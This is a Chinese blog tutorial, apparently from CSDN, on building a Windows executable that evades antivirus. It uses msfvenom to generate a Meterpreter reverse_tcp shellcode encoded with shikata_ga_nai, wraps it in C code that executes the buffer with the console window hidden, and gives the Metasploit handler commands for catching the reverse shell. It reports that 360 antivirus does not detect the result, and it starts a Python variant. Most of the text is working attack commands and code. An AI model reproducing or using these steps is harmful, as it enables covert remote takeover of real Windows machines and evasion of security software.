MSF 生成静态免杀shell(win)

本文介绍了如何使用Metasploit Framework(MSF)和C编译器或者Python来生成静态免杀的Windows shellcode。通过msfvenom生成shellcode,然后在C程序中加入入口函数并编译成可执行文件。在360杀毒软件下测试,成功实现了免杀效果,但执行特定恶意命令时仍会被360检测到。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

NO.1

利用工具
  1. msf

    msf全称 MetasploitFramework,是一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台,它集成了各种平台上常见的溢出漏洞和流行的shellcode,并且不断更新,使得缓冲区溢出测试变的方便和简单。

  2. vc++

    c编译器

实现过程

1.使用msfvenom生成shellcode

msfvenom -p  windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b\x00’ lhost=192.168.68.129 lport=3333   -f c -o /root/Desktop/shell/shell.c
  -p : 指定payload; -e :指定编码方式; -i :编译次数; -b :去除指定代码,一般是空代码或者错误代码; lhost :指定本机IP; -lport :指定本机监听端口; -f :指定生成格式; -o指定生成输出后存储文件的位置

上图
这里写图片描述
这里写图片描述
2. 加入入口函数,开始编译

main()
{
((void(*)(void))&buf)();
}

上图
这里写图片描述
执行后会在下方有显示,不成功会报错,成功会提示error为0(3是开始执行,这里我没点,我待会手动运行)
这里写图片描述
最后会在你原文件存在的目录生成exe可执行文件
这里写图片描述
编译ok
3. 开始监听

msfconsole   //运行msf
use exploit/multi/handler   //使用handler模块
set lhost 192.168.68.129   //这里的IP需要和exp中IP一致
set lport 3333            //端口与IP一样要和上面的端口一致
set payload windows/meterpreter/reverse_tcp  //指定payload
exploit                   //开始监听

上图
这里写图片描述
4. 运行exe,看是否免杀
这里写图片描述
可以看到监听到IP
这里写图片描述
查看返回的session
这里写图片描述
运行成功,360没有报毒
但是有没有发现运行exe文件会弹出一个命令框,这样很容易就被发现了,所以需要对这个exp进行完善,所以请看number tow

NO.2

前面的步骤都一样,在编译时多添几行代码

#include<stdio.h>
#include<windows.h>
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")    //禁止弹窗

上图
这里写图片描述
运行监听
这里写图片描述
360没报毒
这里写图片描述
OK;
以上呢都是c编译的,还有一种方法,可以使用Python编译生成exp,详细见number three

NO.3

利用工具
  1. msf
  2. Python2
实现过程

1.生成.py的shellcode

msfvenom -p  windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b\x00’ lhost=192.168.68.129 lport=3333   -f py -o /home/shell/test001.py

上图

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值